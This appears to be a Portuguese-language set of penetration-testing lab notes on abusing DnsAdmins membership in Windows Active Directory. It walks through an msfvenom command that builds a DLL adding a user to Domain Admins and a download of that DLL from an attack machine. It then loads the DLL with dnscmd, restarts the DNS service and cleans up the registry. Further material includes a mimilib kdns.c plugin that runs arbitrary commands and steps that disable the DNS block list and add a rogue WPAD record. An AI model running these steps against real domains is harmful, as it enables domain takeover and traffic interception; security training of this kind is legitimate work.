DnsAdmins

Os membros do grupo DnsAdmins têm acesso às informações de DNS na rede.

Geração de DLL maliciosa

• Podemos gerar uma DLL maliciosa para adicionar um usuário ao grupo domain admins usando msfvenom

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

• Em seguida, inicie um servidor HTTP em Python

python3 -m http.server 7777

• Faça o download do arquivo para o destino

wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"

• Carregando DLL como membro do grupo DnsAdmins

Get-ADGroupMember -Identity DnsAdmins

• Carregando DLL personalizada

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

• Primeiro, precisamos do SID do nosso usuário

wmic useraccount where name="netadm" get sid

• Verificando permissões no serviço DNS

sc.exe sdshow DNS

• Interrompendo o serviço DNS

sc stop dns

• Iniciando o serviço DNS

sc start dns

• Confirmação de participação no grupo

 net group "Domain Admins" /dom

Confirmação da adição da chave de registro

• O primeiro passo é confirmar se a ServerLevelPluginDllchave de registro existe. Até que nossa DLL personalizada seja removida, não conseguiremos iniciar o serviço DNS corretamente.

reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

• Podemos usar o reg deletecomando para remover a chave que aponta para nossa DLL personalizada.

reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  /v ServerLevelPluginDll

• Assim que isso for concluído, podemos iniciar o serviço DNS novamente.

sc.exe start dns

• Verificando o status do serviço DNS

sc query dns

Usando Mimilib.dll

Conforme detalhado nesta postagem , também podemos utilizar o mimilib.dll, fornecido pelo criador da Mimikatzferramenta, para obter execução de comandos, modificando o arquivo kdns.c para executar um comando reverso de uma linha ou outro comando de nossa escolha.

/*  Benjamin DELPY `gentilkiwi`
    https://blog.gentilkiwi.com
    benjamin@gentilkiwi.com
    Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
    return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
    return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
    FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
    if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
    {
        klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
        fclose(kdns_logfile);
        system("ENTER COMMAND HERE");
    }
    return ERROR_SUCCESS;
}

Desativar a lista de bloqueio de consultas globais

• Para configurar esse ataque, primeiro desativamos a lista de bloqueio de consultas global:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

Adicionando um registro WPAD

• Em seguida, adicionamos um registro WPAD apontando para nossa máquina de ataque.

Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3